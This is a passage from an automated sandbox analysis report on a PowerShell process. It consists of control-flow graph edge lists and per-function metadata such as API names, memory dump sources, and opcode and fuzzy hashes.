7ffd9b88c869-7ffd9b88c932 77->79 80 7ffd9b88c809-7ffd9b88c81a 77->80 78->79 82 7ffd9b88c7b8-7ffd9b88c7c8 78->82 97 7ffd9b88c93b-7ffd9b88c93f 79->97 98 7ffd9b88c934-7ffd9b88c939 79->98 83 7ffd9b88c836-7ffd9b88c83d 80->83 84 7ffd9b88c81c-7ffd9b88c822 80->84 85 7ffd9b88c7ca-7ffd9b88c7ec 82->85 86 7ffd9b88c7f0-7ffd9b88c7f5 82->86 83->74 83->77 84->79 87 7ffd9b88c824-7ffd9b88c832 84->87 85->86 86->72 86->78 87->83 99 7ffd9b88c942-7ffd9b88ca2c call 7ffd9b884620 97->99 98->99 113 7ffd9b88ca35-7ffd9b88ca39 99->113 114 7ffd9b88ca2e-7ffd9b88ca33 99->114 115 7ffd9b88ca3c-7ffd9b88ca87 113->115 114->115 119 7ffd9b88ca89-7ffd9b88ca8e 115->119 120 7ffd9b88ca90-7ffd9b88ca94 115->120 121 7ffd9b88ca97-7ffd9b88cb84 119->121 120->121 133 7ffd9b88cb8c-7ffd9b88cb93 121->133 134 7ffd9b88cb9a-7ffd9b88cbb6 133->134 136 7ffd9b88cbb8-7ffd9b88cbba 134->136 137 7ffd9b88cbbc-7ffd9b88cbd5 134->137 138 7ffd9b88cbd7-7ffd9b88cbe5 136->138 137->138 140 7ffd9b88cbeb-7ffd9b88cc40 138->140 141 7ffd9b88cc72-7ffd9b88cc9e 138->141 163 7ffd9b88cc42-7ffd9b88cc5c call 7ffd9b887c08 140->163 142 7ffd9b88cd58-7ffd9b88cd98 141->142 143 7ffd9b88cca4-7ffd9b88cd51 call 7ffd9b887bb8 141->143 153 7ffd9b88ce89-7ffd9b88ce97 call 7ffd9b88cf2e 142->153 154 7ffd9b88cd9e-7ffd9b88cdac 142->154 143->142 164 7ffd9b88ce99-7ffd9b88cea7 153->164 165 7ffd9b88ceaa-7ffd9b88ceb5 153->165 157 7ffd9b88ce41-7ffd9b88ce67 154->157 158 7ffd9b88cdb2-7ffd9b88cdbd 154->158 167 7ffd9b88ce6c-7ffd9b88ce6f 157->167 180 7ffd9b88cc5e-7ffd9b88cc62 163->180 181 7ffd9b88cc63-7ffd9b88cc6b 163->181 164->165 173 7ffd9b88ceb7-7ffd9b88cefb call 7ffd9b882ed8 165->173 174 7ffd9b88cf0d-7ffd9b88cf2d 165->174 170 7ffd9b88ce71-7ffd9b88ce81 167->170 171 7ffd9b88ce82-7ffd9b88ce86 167->171 170->171 171->153 173->174 180->163 180->181 181->141
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1738319558.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_7ffd9b880000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ZN_H$d$x6}1$x6}1$x6}1$x6}1$6}1$6}1
                                                                                        • API String ID: 0-2474218188
                                                                                        • Opcode ID: dc0b942f85737329fb7d45a481ec2cd0d929a64e1bc9ac7d208b14191094007d
                                                                                        • Instruction ID: d2beae4ec43988c927c81d43e6213769e8c8f9ff0a67e4b6af80054a13b79d1b
                                                                                        • Opcode Fuzzy Hash: dc0b942f85737329fb7d45a481ec2cd0d929a64e1bc9ac7d208b14191094007d
                                                                                        • Instruction Fuzzy Hash: F2823631B0DE4D4FE769DB288865AB577E1FF59300B5542BAC06EC71EADE34A8438740
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9B88D4F9 Relevance: 1.7, APIs: 1, Instructions: 247fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1738319558.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_7ffd9b880000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: d315d1922143c0982f141db2a133e8266013a68b970033c33d938f755129a714
                                                                                        • Instruction ID: 98b98af86e18acfe89ac68108038518e7cee141c0048a27962f0318426493692
                                                                                        • Opcode Fuzzy Hash: d315d1922143c0982f141db2a133e8266013a68b970033c33d938f755129a714
                                                                                        • Instruction Fuzzy Hash: BD71D371A0DA484FDB58DF6C9855AA97BE0FF59310F0502BFE059D72A2DB34A8028781
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9B8845DA Relevance: 1.6, APIs: 1, Instructions: 130fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 349 7ffd9b8845da-7ffd9b88d673 353 7ffd9b88d675-7ffd9b88d67a 349->353 354 7ffd9b88d67d-7ffd9b88d6dc CreateFileW 349->354 353->354 355 7ffd9b88d6de 354->355 356 7ffd9b88d6e4-7ffd9b88d70c 354->356 355->356
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1738319558.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_7ffd9b880000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: b07b47d0cf56eef4fd15aa993507c5b2fee8dd689ee12f6ea08c928d880ea19a
                                                                                        • Instruction ID: 877659eda23e41ceeea52d02b9ee44e7be2f1a9375d16004043fde385eb8573e
                                                                                        • Opcode Fuzzy Hash: b07b47d0cf56eef4fd15aa993507c5b2fee8dd689ee12f6ea08c928d880ea19a
                                                                                        • Instruction Fuzzy Hash: 3831827191CA1C9FDB58EF58D845AF9B7E0FB69321F10422EE04EE3251DB71A8428BC5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9B8845EA Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 358 7ffd9b8845ea-7ffd9b8cfcc2 GetFileType 362 7ffd9b8cfcca-7ffd9b8cfcef 358->362 363 7ffd9b8cfcc4 358->363 363->362
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1738319558.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_7ffd9b880000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileType
                                                                                        • String ID:
                                                                                        • API String ID: 3081899298-0
                                                                                        • Opcode ID: 5f7e8ad2e90b1441cc6b69dfa559d58e61ab5fb6d4c2cf2f702f9ebb6c4870d5
                                                                                        • Instruction ID: c5bbf0c48b1f3fa4ec0fad2f63ea8957e3df539be28c39af107e87fa3da08655
                                                                                        • Opcode Fuzzy Hash: 5f7e8ad2e90b1441cc6b69dfa559d58e61ab5fb6d4c2cf2f702f9ebb6c4870d5
                                                                                        • Instruction Fuzzy Hash: 4E21B570A08A1C9FDB5CEB58D845BF977E0FB59321F00412ED049D3691DB71A816CB80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9B9515DD Relevance: .7, Instructions: 658COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 471 7ffd9b9515dd-7ffd9b9515e7 472 7ffd9b9515ee-7ffd9b9515ff 471->472 473 7ffd9b9515e9 471->473 475 7ffd9b951601 472->475 476 7ffd9b951606-7ffd9b951617 472->476 473->472 474 7ffd9b9515eb 473->474 474->472 475->476 477 7ffd9b951603 475->477 478 7ffd9b95161e-7ffd9b95162f 476->478 479 7ffd9b951619 476->479 477->476 481 7ffd9b951631 478->481 482 7ffd9b951636-7ffd9b951647 478->482 479->478 480 7ffd9b95161b 479->480 480->478 481->482 483 7ffd9b951633 481->483 484 7ffd9b95164e-7ffd9b95170f 482->484 485 7ffd9b951649 482->485 483->482 489 7ffd9b951715-7ffd9b95171f 484->489 490 7ffd9b951926-7ffd9b951984 484->490 485->484 487 7ffd9b95164b 485->487 487->484 491 7ffd9b951721-7ffd9b951739 489->491 492 7ffd9b95173b-7ffd9b951748 489->492 508 7ffd9b9519af-7ffd9b9519bb 490->508 509 7ffd9b951986-7ffd9b9519ad 490->509 491->492 499 7ffd9b95174e-7ffd9b951751 492->499 500 7ffd9b9518bb-7ffd9b9518c5 492->500 499->500 502 7ffd9b951757-7ffd9b95175f 499->502 503 7ffd9b9518c7-7ffd9b9518d7 500->503 504 7ffd9b9518d8-7ffd9b951923 500->504 502->490 506 7ffd9b951765-7ffd9b95176f 502->506 504->490 510 7ffd9b951771-7ffd9b95177f 506->510 511 7ffd9b951789-7ffd9b95178f 506->511 516 7ffd9b9519c6-7ffd9b9519d7 508->516 509->508 510->511 519 7ffd9b951781-7ffd9b951787 510->519 511->500 513 7ffd9b951795-7ffd9b951798 511->513 517 7ffd9b9517e1 513->517 518 7ffd9b95179a-7ffd9b9517ad 513->518 530 7ffd9b9519e0-7ffd9b9519ef 516->530 531 7ffd9b9519d9 516->531 521 7ffd9b9517e3-7ffd9b9517e5 517->521 518->490 532 7ffd9b9517b3-7ffd9b9517bd 518->532 519->511 521->500 526 7ffd9b9517eb-7ffd9b9517ee 521->526 527 7ffd9b9517f0-7ffd9b9517f9 526->527 528 7ffd9b951805-7ffd9b951809 526->528 527->528 528->500 539 7ffd9b95180f-7ffd9b951815 528->539 537 7ffd9b9519f1 530->537 538 7ffd9b9519f8-7ffd9b951a75 530->538 531->530 535 7ffd9b9517bf-7ffd9b9517d4 532->535 536 7ffd9b9517d6-7ffd9b9517df 532->536 535->536 536->521 537->538 544 7ffd9b951a77-7ffd9b951a87 538->544 545 7ffd9b951ae8-7ffd9b951af2 538->545 542 7ffd9b951831-7ffd9b951837 539->542 543 7ffd9b951817-7ffd9b951824 539->543 548 7ffd9b951853-7ffd9b951890 542->548 549 7ffd9b951839-7ffd9b951846 542->549 543->542 557 7ffd9b951826-7ffd9b95182f 543->557 554 7ffd9b951a94-7ffd9b951aaa 544->554 555 7ffd9b951a89-7ffd9b951a92 544->555 550 7ffd9b951af4-7ffd9b951af9 545->550 551 7ffd9b951afc-7ffd9b951b41 545->551 573 7ffd9b951892-7ffd9b9518a7 548->573 574 7ffd9b9518a9-7ffd9b9518ba 548->574 549->548 562 7ffd9b951848-7ffd9b951851 549->562 559 7ffd9b951afa-7ffd9b951afb 550->559 554->559 569 7ffd9b951aac-7ffd9b951ae5 554->569 555->554 557->542 562->548 573->574
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1738955567.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_7ffd9b950000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cd58d5d792a721643be4243bc8d9ac39fa276f36aea20871e9978224a12df585
                                                                                        • Instruction ID: 197e59084aae9bb4e711a241cd32052f3fa18ece65fc003fe938bd67e753d41f
                                                                                        • Opcode Fuzzy Hash: cd58d5d792a721643be4243bc8d9ac39fa276f36aea20871e9978224a12df585
                                                                                        • Instruction Fuzzy Hash: 28123621A5FBD92FE76687B858355A47FE1EF42214B0A01FBD488C70F3EA589D06C352
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 00007FFD9B88F521 Relevance: 1.7, Strings: 1, Instructions: 464COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1738319558.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_7ffd9b880000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: NN_^
                                                                                        • API String ID: 0-2440785328
                                                                                        • Opcode ID: 848a74491cd94ebad4216e3d8e575999ce58f1515de151aebed326665fc4264e
                                                                                        • Instruction ID: a593e22fe1aaf971d3bcfc4b5ee17d2acf80351471f2c168ee2bf828179e693f
                                                                                        • Opcode Fuzzy Hash: 848a74491cd94ebad4216e3d8e575999ce58f1515de151aebed326665fc4264e
                                                                                        • Instruction Fuzzy Hash: 51D12612B0E9B64AE32A73BCBC795F86B50DF85368B0941F7D29DCB0E79908644783D1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9B880E3C Relevance: 1.6, Strings: 1, Instructions: 311COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1738319558.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_7ffd9b880000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: n[_
                                                                                        • API String ID: 0-1638162162
                                                                                        • Opcode ID: 6aa03d9211a0f0e4280f645e3c13d05f37f7cd7e5946dbe9d6cabd03d70c8367
                                                                                        • Instruction ID: 6aef2799521c11f854960949efbbb7ab41abf85becc435fb04fe09a82b514f51
                                                                                        • Opcode Fuzzy Hash: 6aa03d9211a0f0e4280f645e3c13d05f37f7cd7e5946dbe9d6cabd03d70c8367
                                                                                        • Instruction Fuzzy Hash: 27A19267F0EADA4BE37267AD28B50953F50EF5666871F00F7C4D58F0A3AC242D0A8211
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%